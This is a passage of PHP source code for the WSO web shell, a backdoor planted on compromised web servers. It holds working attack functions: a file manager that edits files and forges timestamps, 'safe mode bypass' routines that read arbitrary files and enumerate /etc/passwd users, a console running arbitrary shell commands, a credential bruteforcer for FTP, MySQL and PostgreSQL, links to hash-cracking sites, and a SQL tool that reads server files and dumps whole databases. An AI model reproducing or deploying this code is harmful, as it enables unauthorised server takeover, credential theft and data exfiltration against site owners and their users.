1103 elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
1104 $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
1105 elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
1106 $dirs[] = array_merge($tmp, array('type' => 'dir'));
1107 }
1108 $GLOBALS['sort'] = $sort;
1109 function wsoCmp($a, $b) {
1110 if($GLOBALS['sort'][0] != 'size')
1111 return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
1112 else
1113 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
1114 }
1115 usort($files, "wsoCmp");
1116 usort($dirs, "wsoCmp");
1117 $files = array_merge($dirs, $files);
1118 $l = 0;
1119 foreach($files as $f) {
1120 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
1121 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
1122 $l = $l?0:1;
1123 }
1124 echo "<tr><td colspan=7>
1125
1126 <input type=hidden name=a value='FilesMan'>
1127 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
1128 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
1129 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
1130 if(class_exists('ZipArchive'))
1131 echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
1132 echo "<option value='tar'>Compress (tar.gz)</option>";
1133 if(!empty($_SESSION['act']) && @count($_SESSION['f']))
1134 echo "<option value='paste'>Paste / Compress</option>";
1135 echo "</select> ";
1136 if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar')))
1137 echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'> ";
1138 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
1139 wsoFooter();
1140}
1141
1142function actionStringTools() {
1143 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
1144 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
1145 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
1146 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
1147 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
1148 $stringTools = array(
1149 'Base64 encode' => 'base64_encode',
1150 'Base64 decode' => 'base64_decode',
1151 'Url encode' => 'urlencode',
1152 'Url decode' => 'urldecode',
1153 'Full urlencode' => 'full_urlencode',
1154 'md5 hash' => 'md5',
1155 'sha1 hash' => 'sha1',
1156 'crypt' => 'crypt',
1157 'CRC32' => 'crc32',
1158 'ASCII to HEX' => 'ascii2hex',
1159 'HEX to ASCII' => 'hex2ascii',
1160 'HEX to DEC' => 'hexdec',
1161 'HEX to BIN' => 'hex2bin',
1162 'DEC to HEX' => 'dechex',
1163 'DEC to BIN' => 'decbin',
1164 'BIN to HEX' => 'binhex',
1165 'BIN to DEC' => 'bindec',
1166 'String to lower case' => 'strtolower',
1167 'String to upper case' => 'strtoupper',
1168 'Htmlspecialchars' => 'htmlspecialchars',
1169 'String length' => 'strlen',
1170 );
1171 if(isset($_POST['ajax'])) {
1172 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1173 ob_start();
1174 if(in_array($_POST['p1'], $stringTools))
1175 echo $_POST['p1']($_POST['p2']);
1176 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
1177 echo strlen($temp), "\n", $temp;
1178 exit;
1179 }
1180 wsoHeader();
1181 echo '<h1>String conversions</h1><div class=content>';
1182 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1183 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1184 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
1185 foreach($stringTools as $k => $v)
1186 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
1187 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
1188 if(!empty($_POST['p1'])) {
1189 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
1190 }
1191 echo"</pre></div><br><h1>Search text in files:</h1><div class=content>
1192
1193 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
1194 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
1195 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
1196 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
1197 <tr><td></td><td><input type='submit' value='>>'></td></tr>
1198 </table></form>";
1199
1200 function wsoRecursiveGlob($path) {
1201 if(substr($path, -1) != '/')
1202 $path.='/';
1203 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
1204 if(is_array($paths)&&@count($paths)) {
1205 foreach($paths as $item) {
1206 if(@is_dir($item)){
1207 if($path!=$item)
1208 wsoRecursiveGlob($item);
1209 } else {
1210 if(@strpos(@file_get_contents($item), @$_POST['p2'])!==false)
1211 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
1212 }
1213 }
1214 }
1215 }
1216 if(@$_POST['p3'])
1217 wsoRecursiveGlob($_POST['c']);
1218 echo "</div><br><h1>Search for hash:</h1><div class=content>
1219
1220 <form method='post' target='_blank' name='hf'>
1221 <input type='text' name='hash' style='width:200px;'><br>
1222 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
1223 <input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
1224 <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
1225 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
1226 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
1227 </form></div>";
1228 wsoFooter();
1229}
1230
1231function actionFilesTools() {
1232 if( isset($_POST['p1']) )
1233 $_POST['p1'] = urldecode($_POST['p1']);
1234 if(@$_POST['p2']=='download') {
1235 if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
1236 ob_start("ob_gzhandler", 4096);
1237 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
1238 if (function_exists("mime_content_type")) {
1239 $type = @mime_content_type($_POST['p1']);
1240 header("Content-Type: " . $type);
1241 } else
1242 header("Content-Type: application/octet-stream");
1243 $fp = @fopen($_POST['p1'], "r");
1244 if($fp) {
1245 while(!@feof($fp))
1246 echo @fread($fp, 1024);
1247 fclose($fp);
1248 }
1249 }exit;
1250 }
1251 if( @$_POST['p2'] == 'mkfile' ) {
1252 if(!file_exists($_POST['p1'])) {
1253 $fp = @fopen($_POST['p1'], 'w');
1254 if($fp) {
1255 $_POST['p2'] = "edit";
1256 fclose($fp);
1257 }
1258 }
1259 }
1260 wsoHeader();
1261 echo '<h1>File tools</h1><div class=content>';
1262 if( !file_exists(@$_POST['p1']) ) {
1263 echo 'File not exists';
1264 wsoFooter();
1265 return;
1266 }
1267 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
1268 if(!$uid) {
1269 $uid['name'] = @fileowner($_POST['p1']);
1270 $gid['name'] = @filegroup($_POST['p1']);
1271 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
1272 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
1273 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
1274 if( empty($_POST['p2']) )
1275 $_POST['p2'] = 'view';
1276 if( is_file($_POST['p1']) )
1277 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
1278 else
1279 $m = array('Chmod', 'Rename', 'Touch');
1280 foreach($m as $v)
1281 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
1282 echo '<br><br>';
1283 switch($_POST['p2']) {
1284 case 'view':
1285 echo '<pre class=ml1>';
1286 $fp = @fopen($_POST['p1'], 'r');
1287 if($fp) {
1288 while( !@feof($fp) )
1289 echo htmlspecialchars(@fread($fp, 1024));
1290 @fclose($fp);
1291 }
1292 echo '</pre>';
1293 break;
1294 case 'highlight':
1295 if( @is_readable($_POST['p1']) ) {
1296 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
1297 $code = @highlight_file($_POST['p1'],true);
1298 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
1299 }
1300 break;
1301 case 'chmod':
1302 if( !empty($_POST['p3']) ) {
1303 $perms = 0;
1304 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
1305 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
1306 if(!@chmod($_POST['p1'], $perms))
1307 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
1308 }
1309 clearstatcache();
1310 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
1311 break;
1312 case 'edit':
1313 if( !is_writable($_POST['p1'])) {
1314 echo 'File isn\'t writeable';
1315 break;
1316 }
1317 if( !empty($_POST['p3']) ) {
1318 $time = @filemtime($_POST['p1']);
1319 $_POST['p3'] = substr($_POST['p3'],1);
1320 $fp = @fopen($_POST['p1'],"w");
1321 if($fp) {
1322 @fwrite($fp,$_POST['p3']);
1323 @fclose($fp);
1324 echo 'Saved!<br><script>p3_="";</script>';
1325 @touch($_POST['p1'],$time,$time);
1326 }
1327 }
1328 echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
1329 $fp = @fopen($_POST['p1'], 'r');
1330 if($fp) {
1331 while( !@feof($fp) )
1332 echo htmlspecialchars(@fread($fp, 1024));
1333 @fclose($fp);
1334 }
1335 echo '</textarea><input type=submit value=">>"></form>';
1336 break;
1337 case 'hexdump':
1338 $c = @file_get_contents($_POST['p1']);
1339 $n = 0;
1340 $h = array('00000000<br>','','');
1341 $len = strlen($c);
1342 for ($i=0; $i<$len; ++$i) {
1343 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
1344 switch ( ord($c[$i]) ) {
1345 case 0: $h[2] .= ' '; break;
1346 case 9: $h[2] .= ' '; break;
1347 case 10: $h[2] .= ' '; break;
1348 case 13: $h[2] .= ' '; break;
1349 default: $h[2] .= $c[$i]; break;
1350 }
1351 $n++;
1352 if ($n == 32) {
1353 $n = 0;
1354 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
1355 $h[1] .= '<br>';
1356 $h[2] .= "\n";
1357 }
1358 }
1359 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
1360 break;
1361 case 'rename':
1362 if( !empty($_POST['p3']) ) {
1363 if(!@rename($_POST['p1'], $_POST['p3']))
1364 echo 'Can\'t rename!<br>';
1365 else
1366 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
1367 }
1368 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
1369 break;
1370 case 'touch':
1371 if( !empty($_POST['p3']) ) {
1372 $time = strtotime($_POST['p3']);
1373 if($time) {
1374 if(!touch($_POST['p1'],$time,$time))
1375 echo 'Fail!';
1376 else
1377 echo 'Touched!';
1378 } else echo 'Bad time format!';
1379 }
1380 clearstatcache();
1381 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
1382 break;
1383 }
1384 echo '</div>';
1385 wsoFooter();
1386}
1387
1388function actionSafeMode() {
1389 $temp='';
1390 ob_start();
1391 switch($_POST['p1']) {
1392 case 1:
1393 $temp=@tempnam($test, 'cx');
1394 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
1395 echo @file_get_contents($temp);
1396 unlink($temp);
1397 } else
1398 echo 'Sorry... Can\'t open file';
1399 break;
1400 case 2:
1401 $files = glob($_POST['p2'].'*');
1402 if( is_array($files) )
1403 foreach ($files as $filename)
1404 echo $filename."\n";
1405 break;
1406 case 3:
1407 $ch = curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!', '', __FILE__));
1408 curl_exec($ch);
1409 break;
1410 case 4:
1411 ini_restore("safe_mode");
1412 ini_restore("open_basedir");
1413 include($_POST['p2']);
1414 break;
1415 case 5:
1416 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1417 $uid = @posix_getpwuid($_POST['p2']);
1418 if ($uid)
1419 echo join(':',$uid)."\n";
1420 }
1421 break;
1422 }
1423 $temp = ob_get_clean();
1424 wsoHeader();
1425 echo '<h1>Safe mode bypass</h1><div class=content>';
1426 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
1427 if($temp)
1428 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
1429 echo '</div>';
1430 wsoFooter();
1431}
1432
1433function actionConsole() {
1434 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
1435 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
1436 $_POST['p1'] .= ' 2>&1';
1437 } elseif(!empty($_POST['p1']))
1438 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;
1439
1440 if(isset($_POST['ajax'])) {
1441 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1442 ob_start();
1443 echo "d.cf.cmd.value='';\n";
1444 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
1445 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
1446 if(@chdir($match[1])) {
1447 $GLOBALS['cwd'] = @getcwd();
1448 echo "c_='".$GLOBALS['cwd']."';";
1449 }
1450 }
1451 echo "d.cf.output.value+='".$temp."';";
1452 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
1453 $temp = ob_get_clean();
1454 echo strlen($temp), "\n", $temp;
1455 exit;
1456 }
1457 wsoHeader();
1458 echo "<script>
1459if(window.Event) window.captureEvents(Event.KEYDOWN);
1460var cmds = new Array('');
1461var cur = 0;
1462function kp(e) {
1463 var n = (window.Event) ? e.which : e.keyCode;
1464 if(n == 38) {
1465 cur--;
1466 if(cur>=0)
1467 document.cf.cmd.value = cmds[cur];
1468 else
1469 cur++;
1470 } else if(n == 40) {
1471 cur++;
1472 if(cur < cmds.length)
1473 document.cf.cmd.value = cmds[cur];
1474 else
1475 cur--;
1476 }
1477}
1478function add(cmd) {
1479 cmds.pop();
1480 cmds.push(cmd);
1481 cmds.push('');
1482 cur = cmds.length-1;
1483}
1484
1485</script>";
1486 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
1487 foreach($GLOBALS['aliases'] as $n => $v) {
1488 if($v == '') {
1489 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1490 continue;
1491 }
1492 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1493 }
1494 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1495 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1496 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
1497 if(!empty($_POST['p1'])) {
1498 echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
1499 }
1500 echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
1501 echo '</form></div><script>d.cf.cmd.focus();</script>';
1502 wsoFooter();
1503}
1504
1505function actionLogout() {
1506 session_destroy();
1507 die('bye!');
1508}
1509
1510function actionSelfRemove() {
1511
1512 if($_POST['p1'] == 'yes')
1513 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1514 die('Shell has been removed');
1515 else
1516 echo 'unlink error!';
1517 if($_POST['p1'] != 'yes')
1518 wsoHeader();
1519 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1520 wsoFooter();
1521}
1522
1523function actionBruteforce() {
1524 wsoHeader();
1525 if( isset($_POST['proto']) ) {
1526 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1527 if( $_POST['proto'] == 'ftp' ) {
1528 function bruteForce($ip,$port,$login,$pass) {
1529 $fp = @ftp_connect($ip, $port?$port:21);
1530 if(!$fp) return false;
1531 $res = @ftp_login($fp, $login, $pass);
1532 @ftp_close($fp);
1533 return $res;
1534 }
1535 } elseif( $_POST['proto'] == 'mysql' ) {
1536 function bruteForce($ip,$port,$login,$pass) {
1537 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1538 @mysql_close($res);
1539 return $res;
1540 }
1541 } elseif( $_POST['proto'] == 'pgsql' ) {
1542 function bruteForce($ip,$port,$login,$pass) {
1543 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
1544 $res = @pg_connect($str);
1545 @pg_close($res);
1546 return $res;
1547 }
1548 }
1549 $success = 0;
1550 $attempts = 0;
1551 $server = explode(":", $_POST['server']);
1552 if($_POST['type'] == 1) {
1553 $temp = @file('/etc/passwd');
1554 if( is_array($temp) )
1555 foreach($temp as $line) {
1556 $line = explode(":", $line);
1557 ++$attempts;
1558 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1559 $success++;
1560 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1561 }
1562 if(@$_POST['reverse']) {
1563 $tmp = "";
1564 for($i=strlen($line[0])-1; $i>=0; --$i)
1565 $tmp .= $line[0][$i];
1566 ++$attempts;
1567 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1568 $success++;
1569 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1570 }
1571 }
1572 }
1573 } elseif($_POST['type'] == 2) {
1574 $temp = @file($_POST['dict']);
1575 if( is_array($temp) )
1576 foreach($temp as $line) {
1577 $line = trim($line);
1578 ++$attempts;
1579 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1580 $success++;
1581 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1582 }
1583 }
1584 }
1585 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1586 }
1587 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1588 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1589 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1590 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1591 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1592 .'<span>Server:port</span></td>'
1593 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1594 .'<tr><td><span>Brute type</span></td>'
1595 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1596 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1597 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1598 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1599 .'<td><input type=text name=login value="root"></td></tr>'
1600 .'<tr><td><span>Dictionary</span></td>'
1601 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1602 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1603 echo '</div><br>';
1604 wsoFooter();
1605}
1606
1607function actionSql() {
1608 class DbClass {
1609 var $type;
1610 var $link;
1611 var $res;
1612 function DbClass($type) {
1613 $this->type = $type;
1614 }
1615 function connect($host, $user, $pass, $dbname){
1616 switch($this->type) {
1617 case 'mysql':
1618 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1619 break;
1620 case 'pgsql':
1621 $host = explode(':', $host);
1622 if(!$host[1]) $host[1]=5432;
1623 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1624 break;
1625 }
1626 return false;
1627 }
1628 function selectdb($db) {
1629 switch($this->type) {
1630 case 'mysql':
1631 if (@mysql_select_db($db))return true;
1632 break;
1633 }
1634 return false;
1635 }
1636 function query($str) {
1637 switch($this->type) {
1638 case 'mysql':
1639 return $this->res = @mysql_query($str);
1640 break;
1641 case 'pgsql':
1642 return $this->res = @pg_query($this->link,$str);
1643 break;
1644 }
1645 return false;
1646 }
1647 function fetch() {
1648 $res = func_num_args()?func_get_arg(0):$this->res;
1649 switch($this->type) {
1650 case 'mysql':
1651 return @mysql_fetch_assoc($res);
1652 break;
1653 case 'pgsql':
1654 return @pg_fetch_assoc($res);
1655 break;
1656 }
1657 return false;
1658 }
1659 function listDbs() {
1660 switch($this->type) {
1661 case 'mysql':
1662 return $this->query("SHOW databases");
1663 break;
1664 case 'pgsql':
1665 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1666 break;
1667 }
1668 return false;
1669 }
1670 function listTables() {
1671 switch($this->type) {
1672 case 'mysql':
1673 return $this->res = $this->query('SHOW TABLES');
1674 break;
1675 case 'pgsql':
1676 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1677 break;
1678 }
1679 return false;
1680 }
1681 function error() {
1682 switch($this->type) {
1683 case 'mysql':
1684 return @mysql_error();
1685 break;
1686 case 'pgsql':
1687 return @pg_last_error();
1688 break;
1689 }
1690 return false;
1691 }
1692 function setCharset($str) {
1693 switch($this->type) {
1694 case 'mysql':
1695 if(function_exists('mysql_set_charset'))
1696 return @mysql_set_charset($str, $this->link);
1697 else
1698 $this->query('SET CHARSET '.$str);
1699 break;
1700 case 'pgsql':
1701 return @pg_set_client_encoding($this->link, $str);
1702 break;
1703 }
1704 return false;
1705 }
1706 function loadFile($str) {
1707 switch($this->type) {
1708 case 'mysql':
1709 return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1710 break;
1711 case 'pgsql':
1712 $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
1713 $r=array();
1714 while($i=$this->fetch())
1715 $r[] = $i['file'];
1716 $this->query('drop table wso2');
1717 return array('file'=>implode("\n",$r));
1718 break;
1719 }
1720 return false;
1721 }
1722 function dump($table, $fp = false) {
1723 switch($this->type) {
1724 case 'mysql':
1725 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1726 $create = mysql_fetch_array($res);
1727 $sql = $create[1].";\n";
1728 if($fp) fwrite($fp, $sql); else echo($sql);
1729 $this->query('SELECT * FROM `'.$table.'`');
1730 $head = true;
1731 while($item = $this->fetch()) {
1732 $columns = array();
1733 foreach($item as $k=>$v) {
1734 if($v == null)
1735 $item[$k] = "NULL";
1736 elseif(is_numeric($v))
1737 $item[$k] = $v;
1738 else
1739 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1740 $columns[] = "`".$k."`";
1741 }
1742 if($head) {
1743 $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
1744 $head = false;
1745 } else
1746 $sql = "\n\t,(".implode(", ", $item).')';
1747 if($fp) fwrite($fp, $sql); else echo($sql);
1748 }
1749 if(!$head)
1750 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1751 break;
1752 case 'pgsql':
1753 $this->query('SELECT * FROM '.$table);
1754 while($item = $this->fetch()) {
1755 $columns = array();
1756 foreach($item as $k=>$v) {
1757 $item[$k] = "'".addslashes($v)."'";
1758 $columns[] = $k;
1759 }
1760 $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1761 if($fp) fwrite($fp, $sql); else echo($sql);
1762 }
1763 break;
1764 }
1765 return false;
1766 }
1767 };
1768 $db = new DbClass($_POST['type']);
1769 if(@$_POST['p2']=='download') {
1770 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
